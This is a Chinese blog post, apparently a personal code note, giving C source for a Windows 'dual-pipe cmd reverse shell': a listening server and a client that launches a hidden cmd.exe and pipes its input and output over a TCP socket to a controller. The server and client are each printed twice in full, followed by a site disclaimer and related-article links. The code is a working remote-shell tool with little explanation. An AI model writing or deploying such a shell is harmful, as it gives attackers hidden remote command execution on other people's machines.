双管道cmd反弹程序
2016-01-24 02:13
330 查看
仅此记录,以备查询
server:
#include <WINSOCK2.H>
#include <windows.h>
#include <stdio.h>
#include <process.h>
#pragma comment(lib,"ws2_32.lib")
void ReceiveThread(LPVOID lPvoid)
{
SOCKET socketNew = (SOCKET)lPvoid;
while(1)
{
char receiveBuf[1024];//接收
int len = recv(socketNew,receiveBuf,sizeof(receiveBuf),0);
if(len <= 0)
{
closesocket(socketNew);
printf("socket error...\n");
ExitThread(0);
}
receiveBuf[len] = 0;
printf("%s",receiveBuf);
}
}
void SendThread(LPVOID lPvoid)
{
SOCKET socketNew = (SOCKET)lPvoid;
char test[] = "dir d:\\";
char sendBuf[1024];
while(1)
{
gets(sendBuf);
//printf("Send:%s\n",sendBuf);
if(SOCKET_ERROR == send(socketNew,sendBuf,strlen(sendBuf),0))
{
printf("Send Error\n");
//第一个套接字关闭后,还未退出该线程,所以输入 ,没有任何效果
//当然这里仅是测试,正常不会不同连接应该对应不同的cmd窗口
ExitThread(0);
}
}
}
void SocketThread(LPVOID lPvoid)
{
SOCKET socketNew = (SOCKET)lPvoid;
_beginthread(ReceiveThread, NULL, (LPVOID)socketNew);
_beginthread(SendThread, NULL, (LPVOID)socketNew);
}
int main(int argc,char **argv)
{
//创建套接字
WORD myVersionRequest;
WSADATA wsaData;
myVersionRequest=MAKEWORD(2,2);
int err;
err=WSAStartup(myVersionRequest,&wsaData);
if (!err){
printf("已打开套接字\n");
}else{
printf("ERROR:嵌套字未打开!");
return 1;
}
//进一步绑定套接字
SOCKET serSocket=socket(AF_INET,SOCK_STREAM,0);//创建了可识别套接字
//需要绑定的参数
SOCKADDR_IN addr;
addr.sin_family=AF_INET;
addr.sin_addr.S_un.S_addr=htonl(INADDR_ANY);//ip地址
addr.sin_port=htons(6000);//绑定端口
bind(serSocket,(SOCKADDR*)&addr,sizeof(SOCKADDR));//绑定完成
listen(serSocket,5);//其中第二个参数代表能够接收的最多的连接数
//////////////////////////////////////////////////////////////////////////
//开始进行监听
//////////////////////////////////////////////////////////////////////////
SOCKADDR_IN clientsocket;
int len=sizeof(SOCKADDR);
while(1)
{
SOCKET socketNew = accept(serSocket,(SOCKADDR*)&clientsocket,&len);
printf("new connection is coming....\n");
_beginthread(SocketThread, NULL, (LPVOID)socketNew);
}
return 1;
}
client:
#include <WINSOCK2.H>
#include <Windows.h>
#include <stdio.h>
#include <process.h>
#pragma comment(lib,"ws2_32.lib")
HANDLE hStdInRead, hStdInWrite;
HANDLE hStdOutRead, hStdOutWrite;
SECURITY_ATTRIBUTES saIn, saOut;
SOCKET clientSocket;
BOOL CreateTwoPipe()
{
DWORD dwRet;
saIn.nLength = sizeof(SECURITY_ATTRIBUTES);
saIn.bInheritHandle = TRUE;
saIn.lpSecurityDescriptor = NULL;
dwRet = CreatePipe(&hStdInRead, &hStdInWrite, &saIn, 0);
if(!dwRet)
{
printf("failed to create in pipe...\n");
return FALSE;
}
saOut.nLength = sizeof(SECURITY_ATTRIBUTES);
saOut.bInheritHandle = TRUE;
saOut.lpSecurityDescriptor = NULL;
dwRet = CreatePipe(&hStdOutRead, &hStdOutWrite, &saOut, 0);
if(!dwRet)
{
printf("failed to create in pipe...\n");
return FALSE;
}
STARTUPINFO si;
ZeroMemory(&si, sizeof(si));
si.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
si.wShowWindow=SW_HIDE;
si.hStdInput = hStdInRead;
si.hStdOutput = hStdOutWrite;
si.hStdError = hStdOutWrite;
char cmdline[]="cmd.exe";
PROCESS_INFORMATION ProcessInformation;
dwRet = CreateProcess(NULL,cmdline,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);
return TRUE;
}
void ReadOutPutReadCmd(LPVOID lPvoid)
{
DWORD dwByteRecv;
char Buf[1024] = {0};
int ret;
while(1)
{
memset(Buf, 0, sizeof(Buf));
PeekNamedPipe(hStdOutRead, Buf, 1024, &dwByteRecv, 0, 0);
if(dwByteRecv)
{
ret = ReadFile(hStdOutRead, Buf, dwByteRecv, &dwByteRecv, 0);
if(!ret)
break;
ret = send(clientSocket, Buf, dwByteRecv, 0);
if(ret <= 0)
break;
}
}
}
int main(int argc,char **argv)
{
int err;
WORD versionRequired;
WSADATA wsaData;
versionRequired=MAKEWORD(2,2);
err=WSAStartup(versionRequired,&wsaData);//协议库的版本信息
if (!err) {
printf("客户端嵌套字已经打开!\n");
}else{
printf("ERROR:客户端的嵌套字打开失败!\n");
return 1;//结束
}
clientSocket=socket(AF_INET,SOCK_STREAM,0);
SOCKADDR_IN clientsock_in;
clientsock_in.sin_addr.S_un.S_addr=inet_addr("127.0.0.1");
clientsock_in.sin_family=AF_INET;
clientsock_in.sin_port=htons(6000);
//bind(clientSocket,(SOCKADDR*)&clientsock_in,strlen(SOCKADDR));//注意第三个参数
//listen(clientSocket,5);
int ret = connect(clientSocket,(SOCKADDR*)&clientsock_in,sizeof(SOCKADDR));//开始连接
if(ret != 0)
{
printf("failed to connect to server...\n");
return 0;
}
if(!CreateTwoPipe())
{
printf("failed to create pipe...\n");
return 0;
}
DWORD dwByteRecv;
char Buf[1024] = {0};
_beginthread(ReadOutPutReadCmd, 0, NULL);
while(1)
{
//memset(Buf, 0, sizeof(Buf));
//Sleep(1000); //等待cmd执行
//PeekNamedPipe(hStdOutRead, Buf, 1024, &dwByteRecv, 0, 0);
//if(dwByteRecv)
//{
// ret = ReadFile(hStdOutRead, Buf, dwByteRecv, &dwByteRecv, 0);
// if(!ret)
// break;
// ret = send(clientSocket, Buf, dwByteRecv, 0);
// if(ret <= 0)
// break;
//}
//else
//{
// dwByteRecv = recv(clientSocket, Buf, 1024, 0);
// if(dwByteRecv <= 0)
// break;
// Buf[dwByteRecv] = '\r';
// Buf[dwByteRecv+1] = '\n';
// Buf[dwByteRecv + 2] = 0;
// printf("recv: %s", Buf);
// ret = WriteFile(hStdInWrite, Buf, dwByteRecv + 2, &dwByteRecv, 0);
// if(!ret)
// break;
//}
dwByteRecv = recv(clientSocket, Buf, 1024, 0);
if(dwByteRecv <= 0)
break;
Buf[dwByteRecv] = '\r';
Buf[dwByteRecv+1] = '\n';
Buf[dwByteRecv + 2] = 0;
printf("recv: %s", Buf);
ret = WriteFile(hStdInWrite, Buf, dwByteRecv + 2, &dwByteRecv, 0);
if(!ret)
break;
}
closesocket(clientSocket);
WSACleanup();
system("pause");
return 0;
}
server:
#include <WINSOCK2.H>
#include <windows.h>
#include <stdio.h>
#include <process.h>
#pragma comment(lib,"ws2_32.lib")
void ReceiveThread(LPVOID lPvoid)
{
SOCKET socketNew = (SOCKET)lPvoid;
while(1)
{
char receiveBuf[1024];//接收
int len = recv(socketNew,receiveBuf,sizeof(receiveBuf),0);
if(len <= 0)
{
closesocket(socketNew);
printf("socket error...\n");
ExitThread(0);
}
receiveBuf[len] = 0;
printf("%s",receiveBuf);
}
}
void SendThread(LPVOID lPvoid)
{
SOCKET socketNew = (SOCKET)lPvoid;
char test[] = "dir d:\\";
char sendBuf[1024];
while(1)
{
gets(sendBuf);
//printf("Send:%s\n",sendBuf);
if(SOCKET_ERROR == send(socketNew,sendBuf,strlen(sendBuf),0))
{
printf("Send Error\n");
//第一个套接字关闭后,还未退出该线程,所以输入 ,没有任何效果
//当然这里仅是测试,正常不会不同连接应该对应不同的cmd窗口
ExitThread(0);
}
}
}
void SocketThread(LPVOID lPvoid)
{
SOCKET socketNew = (SOCKET)lPvoid;
_beginthread(ReceiveThread, NULL, (LPVOID)socketNew);
_beginthread(SendThread, NULL, (LPVOID)socketNew);
}
int main(int argc,char **argv)
{
//创建套接字
WORD myVersionRequest;
WSADATA wsaData;
myVersionRequest=MAKEWORD(2,2);
int err;
err=WSAStartup(myVersionRequest,&wsaData);
if (!err){
printf("已打开套接字\n");
}else{
printf("ERROR:嵌套字未打开!");
return 1;
}
//进一步绑定套接字
SOCKET serSocket=socket(AF_INET,SOCK_STREAM,0);//创建了可识别套接字
//需要绑定的参数
SOCKADDR_IN addr;
addr.sin_family=AF_INET;
addr.sin_addr.S_un.S_addr=htonl(INADDR_ANY);//ip地址
addr.sin_port=htons(6000);//绑定端口
bind(serSocket,(SOCKADDR*)&addr,sizeof(SOCKADDR));//绑定完成
listen(serSocket,5);//其中第二个参数代表能够接收的最多的连接数
//////////////////////////////////////////////////////////////////////////
//开始进行监听
//////////////////////////////////////////////////////////////////////////
SOCKADDR_IN clientsocket;
int len=sizeof(SOCKADDR);
while(1)
{
SOCKET socketNew = accept(serSocket,(SOCKADDR*)&clientsocket,&len);
printf("new connection is coming....\n");
_beginthread(SocketThread, NULL, (LPVOID)socketNew);
}
return 1;
}
client:
#include <WINSOCK2.H>
#include <Windows.h>
#include <stdio.h>
#include <process.h>
#pragma comment(lib,"ws2_32.lib")
HANDLE hStdInRead, hStdInWrite;
HANDLE hStdOutRead, hStdOutWrite;
SECURITY_ATTRIBUTES saIn, saOut;
SOCKET clientSocket;
BOOL CreateTwoPipe()
{
DWORD dwRet;
saIn.nLength = sizeof(SECURITY_ATTRIBUTES);
saIn.bInheritHandle = TRUE;
saIn.lpSecurityDescriptor = NULL;
dwRet = CreatePipe(&hStdInRead, &hStdInWrite, &saIn, 0);
if(!dwRet)
{
printf("failed to create in pipe...\n");
return FALSE;
}
saOut.nLength = sizeof(SECURITY_ATTRIBUTES);
saOut.bInheritHandle = TRUE;
saOut.lpSecurityDescriptor = NULL;
dwRet = CreatePipe(&hStdOutRead, &hStdOutWrite, &saOut, 0);
if(!dwRet)
{
printf("failed to create in pipe...\n");
return FALSE;
}
STARTUPINFO si;
ZeroMemory(&si, sizeof(si));
si.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
si.wShowWindow=SW_HIDE;
si.hStdInput = hStdInRead;
si.hStdOutput = hStdOutWrite;
si.hStdError = hStdOutWrite;
char cmdline[]="cmd.exe";
PROCESS_INFORMATION ProcessInformation;
dwRet = CreateProcess(NULL,cmdline,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);
return TRUE;
}
void ReadOutPutReadCmd(LPVOID lPvoid)
{
DWORD dwByteRecv;
char Buf[1024] = {0};
int ret;
while(1)
{
memset(Buf, 0, sizeof(Buf));
PeekNamedPipe(hStdOutRead, Buf, 1024, &dwByteRecv, 0, 0);
if(dwByteRecv)
{
ret = ReadFile(hStdOutRead, Buf, dwByteRecv, &dwByteRecv, 0);
if(!ret)
break;
ret = send(clientSocket, Buf, dwByteRecv, 0);
if(ret <= 0)
break;
}
}
}
int main(int argc,char **argv)
{
int err;
WORD versionRequired;
WSADATA wsaData;
versionRequired=MAKEWORD(2,2);
err=WSAStartup(versionRequired,&wsaData);//协议库的版本信息
if (!err) {
printf("客户端嵌套字已经打开!\n");
}else{
printf("ERROR:客户端的嵌套字打开失败!\n");
return 1;//结束
}
clientSocket=socket(AF_INET,SOCK_STREAM,0);
SOCKADDR_IN clientsock_in;
clientsock_in.sin_addr.S_un.S_addr=inet_addr("127.0.0.1");
clientsock_in.sin_family=AF_INET;
clientsock_in.sin_port=htons(6000);
//bind(clientSocket,(SOCKADDR*)&clientsock_in,strlen(SOCKADDR));//注意第三个参数
//listen(clientSocket,5);
int ret = connect(clientSocket,(SOCKADDR*)&clientsock_in,sizeof(SOCKADDR));//开始连接
if(ret != 0)
{
printf("failed to connect to server...\n");
return 0;
}
if(!CreateTwoPipe())
{
printf("failed to create pipe...\n");
return 0;
}
DWORD dwByteRecv;
char Buf[1024] = {0};
_beginthread(ReadOutPutReadCmd, 0, NULL);
while(1)
{
//memset(Buf, 0, sizeof(Buf));
//Sleep(1000); //等待cmd执行
//PeekNamedPipe(hStdOutRead, Buf, 1024, &dwByteRecv, 0, 0);
//if(dwByteRecv)
//{
// ret = ReadFile(hStdOutRead, Buf, dwByteRecv, &dwByteRecv, 0);
// if(!ret)
// break;
// ret = send(clientSocket, Buf, dwByteRecv, 0);
// if(ret <= 0)
// break;
//}
//else
//{
// dwByteRecv = recv(clientSocket, Buf, 1024, 0);
// if(dwByteRecv <= 0)
// break;
// Buf[dwByteRecv] = '\r';
// Buf[dwByteRecv+1] = '\n';
// Buf[dwByteRecv + 2] = 0;
// printf("recv: %s", Buf);
// ret = WriteFile(hStdInWrite, Buf, dwByteRecv + 2, &dwByteRecv, 0);
// if(!ret)
// break;
//}
dwByteRecv = recv(clientSocket, Buf, 1024, 0);
if(dwByteRecv <= 0)
break;
Buf[dwByteRecv] = '\r';
Buf[dwByteRecv+1] = '\n';
Buf[dwByteRecv + 2] = 0;
printf("recv: %s", Buf);
ret = WriteFile(hStdInWrite, Buf, dwByteRecv + 2, &dwByteRecv, 0);
if(!ret)
break;
}
closesocket(clientSocket);
WSACleanup();
system("pause");
return 0;
}
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- Java 异常处理的捕获形式
- (spring-第15回【IoC基础篇】)容器事件
- solr安装-tomcat+solrCloud构建稳健solr集群
- solrCloud+tomcat+zookeeper集群配置
- 小笔记
- python的单例模式与讨论
- SolrCloud原理介绍
- 被 Apple Dev 帐号坑了好几天
- Edge——代号是Project Spartan Windows 10的缺省浏览器
- 感慨一下
- VS2013与MySql建立连接;您的项目引用了最新实体框架;但是,找不到数据链接所需的与版本兼容的实体框架数据库 EF6使用Mysql的技巧
- ubuntu14.04安装gnu/emacs24
- html和css基础
- 清空mysql表后,自增id复原
- 大 一 上 —— 小 结
- CSS float和absolute
- 博弈之 Nim 游戏&poj 3537 Crosses and Crosses
- httpWebRequest WebClient下载慢的问题处理
- 安利安卓模拟器-夜神模拟器
- HttpWebRequest类(模拟)